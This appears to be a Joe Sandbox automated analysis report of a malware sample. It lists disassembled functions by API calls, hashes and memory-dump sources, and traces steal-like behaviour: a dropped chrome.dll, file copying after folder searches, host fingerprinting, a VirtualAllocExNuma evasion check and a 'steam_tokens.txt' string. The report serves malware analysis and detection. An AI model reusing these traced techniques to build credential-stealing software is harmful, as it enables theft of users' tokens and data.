Opcode ID: b3c7eb08bdb27c17df0a595ad6a35b21054426e05c9e3aa312843089f6760e13
Instruction ID: 7a1763d3762e4bc1164bf129b3bea8c613207f41675935a6caeb9cdf66552cef
Opcode Fuzzy Hash: b3c7eb08bdb27c17df0a595ad6a35b21054426e05c9e3aa312843089f6760e13
Instruction Fuzzy Hash: 4E01D6B6E0520867CB14FB71EC53EDE733D9B54305F00419EB64996091EE78ABC8CBA5

Function 004108ED Relevance: 4.7, APIs: 3, Instructions: 223fileCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,0096C408), ref: 00410922
StrCmpCA.SHLWAPI(00000000,0096C3F8), ref: 00410B79
StrCmpCA.SHLWAPI(00000000,0096C418), ref: 00410A0C

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00410C35

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: DeleteFilelstrcpy
String ID:
API String ID: 273707478-0
Opcode ID: 350fdc06db04c550adeb669f8e4f57cb64e705fbcd002e2c70181c845b731ff4
Instruction ID: 55ebfe5bea072269aba33a565d8c59cbe62f1375a0798b8cb4aa3666f491b8e5
Opcode Fuzzy Hash: 350fdc06db04c550adeb669f8e4f57cb64e705fbcd002e2c70181c845b731ff4
Instruction Fuzzy Hash: EA916471B001089FCB18EF65DA95EED77B6EF94304F10816EE40A9F391DB349A49CB86

Function 00419850 Relevance: 4.5, APIs: 3, Instructions: 48fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,004108DC,C:\ProgramData\chrome.dll), ref: 00419871
WriteFile.KERNEL32(000000FF,004108DC,?,004108DC,00000000,?,004108DC), ref: 004198A3

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: File$CreateWrite
String ID:
API String ID: 2263783195-0
Opcode ID: 87033afd89575812e055b209c04b4c4260860767bd957b8fe466ea0b568eb40e
Instruction ID: c00870ae4f46cd9ec0fbaadc8d13ab59566e93f84a6b66ec8604c729da6f8a20
Opcode Fuzzy Hash: 87033afd89575812e055b209c04b4c4260860767bd957b8fe466ea0b568eb40e
Instruction Fuzzy Hash: BE11C830A08248BBDB10EFA0DC15BDE7B795F05314F044199F655A72C1DB346B45C7DA

Function 00417A70 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416CCB), ref: 00417AA0
HeapAlloc.KERNEL32(00000000,?,?,?,00416CCB), ref: 00417AA7
GetComputerNameA.KERNEL32(?,00000104), ref: 00417ABF

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: bd395e3c10b2e9752f846d4f55ec5ddb2c88ed80ced139acaed9e3128f7bbde2
Instruction ID: 80df14e24d55d9e77394b8c0389cbc6422d62e125eda11eaf6ba37d1415b345b
Opcode Fuzzy Hash: bd395e3c10b2e9752f846d4f55ec5ddb2c88ed80ced139acaed9e3128f7bbde2
Instruction Fuzzy Hash: D60181B1E08359ABC700CF98DD45BAFBBB8FB04751F10021BF505E2280E7B85A408BA2

Function 00419600 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 00419614
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00419635
CloseHandle.KERNEL32(00000000), ref: 0041963F

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: 38bec2c2861d1061a7e63eb7caa5b35248e167512e01a3ac08b79c0d7adc0fad
Instruction ID: 8add19ce2c94a4db983c162c5ea883653429c1f160fd421327fd5bffa921fc45
Opcode Fuzzy Hash: 38bec2c2861d1061a7e63eb7caa5b35248e167512e01a3ac08b79c0d7adc0fad
Instruction Fuzzy Hash: 95F03A7490120CEFDB14DBA4DD4AFEA7778BB08300F004599FA1997280E6B06E84CB95

Function 00401110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416CBC), ref: 0040112B
VirtualAllocExNuma.KERNEL32(00000000,?,?,00416CBC), ref: 00401132
ExitProcess.KERNEL32 ref: 00401143

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: 11ea4e03c837496306c88658afd9ed440fb44e3d5b70bdcdd02673fa8ef340ef
Instruction ID: f86d798d442288df0e099431c712f1cdbed5da6d4770a056b1c254158006f616
Opcode Fuzzy Hash: 11ea4e03c837496306c88658afd9ed440fb44e3d5b70bdcdd02673fa8ef340ef
Instruction Fuzzy Hash: DCE0E670D8A30CFBE7105BA19D0AB4D77689B04B15F101156F709BA5D0D6B92640565D

Function 61E33F01 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 106fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32 ref: 61E33FB1

Strings

winRead, xrefs: 61E33FF4

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID: FileRead
String ID: winRead
API String ID: 2738559852-2759563040
Opcode ID: 851fea00ae6f1ba7616ac175e32ee1177d3feb74bace6ba213d978081e29e1e5
Instruction ID: 0463a8294cdaeeb391ba6f45b5ad466d8cdf6662135ec028d0205bc88dba3c8e
Opcode Fuzzy Hash: 851fea00ae6f1ba7616ac175e32ee1177d3feb74bace6ba213d978081e29e1e5
Instruction Fuzzy Hash: 2041E475A052699BCF04CFA8D88498EBBF2FF88314F618529E868A7354D730E941CB91

Function 00406C30 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(E9FC458B,087400FC,00000040,00000040), ref: 00406CEF

Strings

@, xrefs: 00406CC9

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID: @
API String ID: 544645111-2766056989
Opcode ID: 7b362698908ff61aa31d4ac6417e82130d01c510d282f3d3cff84c4ea47e76dd
Instruction ID: 960187402ee01aff1aca01ef16381d87fa4c626a1601440f33a421b94010635f
Opcode Fuzzy Hash: 7b362698908ff61aa31d4ac6417e82130d01c510d282f3d3cff84c4ea47e76dd
Instruction Fuzzy Hash: D6213374A04208EFDB04CF88D544BADBBB1FF48304F1181AAD456AB381D3799A91DF85

Function 61E354D1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,?,61ECC400,?,61E35248), ref: 61E354EB

Strings

HRa, xrefs: 61E3554C

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID: InfoSystem
String ID: HRa
API String ID: 31276548-1004199025
Opcode ID: 90f829b77809e80cd7cc556866e5c439b2c19dcd8d7a36888ffec522c66ecd4c
Instruction ID: 06cda1940385b8855eb11c4b22b944da250b3e82bd825487f891a332eec36e05
Opcode Fuzzy Hash: 90f829b77809e80cd7cc556866e5c439b2c19dcd8d7a36888ffec522c66ecd4c
Instruction Fuzzy Hash: 56F03AB02083419BD704AFA4C60631FBAF5AFC6B09F66C82DD1858B380CB75D8559B93

Function 00406D90 Relevance: 3.2, APIs: 2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f67c1ee81b792ebf250256528aa3b6b9dcb1e54953850a22de8d950c6cb86ce9
Instruction ID: fd8884a5b4d1e95754380b5432cffff504e2d4d7245242e6cdc6148b35b0e1b4
Opcode Fuzzy Hash: f67c1ee81b792ebf250256528aa3b6b9dcb1e54953850a22de8d950c6cb86ce9
Instruction Fuzzy Hash: 816127B4900209DFCB14CF94E944BEEB7B0BB48304F1185AAE80677380D779AEA5DF95

Function 00414E00 Relevance: 3.1, APIs: 2, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B

lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414E3A
lstrcatA.KERNEL32(?,009745C0), ref: 00414E58

Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414B7C
Part of subcall function 00414B60: FindFirstFileA.KERNEL32(?,?), ref: 00414B93

Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC4), ref: 00414BC1
Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414BD7
Part of subcall function 00414B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00414DCD
Part of subcall function 00414B60: FindClose.KERNEL32(000000FF), ref: 00414DE2

Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414C00
Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,004208D3), ref: 00414C15
Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414C32
Part of subcall function 00414B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00414C6E
Part of subcall function 00414B60: lstrcatA.KERNEL32(?,0096C4E8,?,000003E8), ref: 00414C9A
Part of subcall function 00414B60: lstrcatA.KERNEL32(?,00420FE0), ref: 00414CAC
Part of subcall function 00414B60: lstrcatA.KERNEL32(?,?), ref: 00414CC0
Part of subcall function 00414B60: lstrcatA.KERNEL32(?,00420FE4), ref: 00414CD2
Part of subcall function 00414B60: lstrcatA.KERNEL32(?,?), ref: 00414CE6
Part of subcall function 00414B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00414CFC
Part of subcall function 00414B60: DeleteFileA.KERNEL32(?), ref: 00414D81

Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414C57

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID:
API String ID: 2104210347-0
Opcode ID: 58344700fbdd61abd122c35d019a996d05a4c8d79970382b44b34d8b8533b851
Instruction ID: e9161ec81bcd1d29be655bd6d91fa6844fd782dbdf96c1af6834d1d6ae200bb8
Opcode Fuzzy Hash: 58344700fbdd61abd122c35d019a996d05a4c8d79970382b44b34d8b8533b851
Instruction Fuzzy Hash: F041B6B7E0410467C754F764FC52EEE333E9BC8304F40855EB54696191ED78AAC88B95

Function 61E15111 Relevance: 3.1, APIs: 2, Instructions: 80threadCOMMON

Download Yara Rule

APIs

_beginthreadex.MSVCRT ref: 61E1512D
GetCurrentThreadId.KERNEL32 ref: 61E15148

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID: CurrentThread_beginthreadex
String ID:
API String ID: 982669324-0
Opcode ID: f615dc7b7e999705fe73c8510302048efcb03f76f94e809957717ec93d4871f7
Instruction ID: 42f2b6fd1f22f931f1f5e4e4650255a3aee80b5d1c0a6131159fee0115e9d0d4
Opcode Fuzzy Hash: f615dc7b7e999705fe73c8510302048efcb03f76f94e809957717ec93d4871f7
Instruction Fuzzy Hash: 193147B1E096498FDB01CFA8E4823DDBBF0BF49719F24806AD804AB344D774C940CB69

Function 00415350 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,0096C238,?,004210F4,?,00000000), ref: 0041AB3B
Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95

lstrlenA.KERNEL32(00000000,00000000,00420ACE,?,?,?,?,?,?,0041635B,?), ref: 0041537A

Strings

steam_tokens.txt, xrefs: 0041538F

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen
String ID: steam_tokens.txt
API String ID: 2001356338-401951677
Opcode ID: 05c3bf2e8d49d1371e3a8ef3ba893d9939886e2072245d48c510c30610a2984f
Instruction ID: 583e1202a90f05d24a8fafb6f0fe3048dc9e4c24137b9a3722a1f5dcf54c1db9
Opcode Fuzzy Hash: 05c3bf2e8d49d1371e3a8ef3ba893d9939886e2072245d48c510c30610a2984f
Instruction Fuzzy Hash: 5AF06D31E1110876CB04FBB2EC679ED733D9E50358F80426EB416220D2EF386698C7AE

Function 61E3402F Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 61E3404C

Strings

winClose, xrefs: 61E34086

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
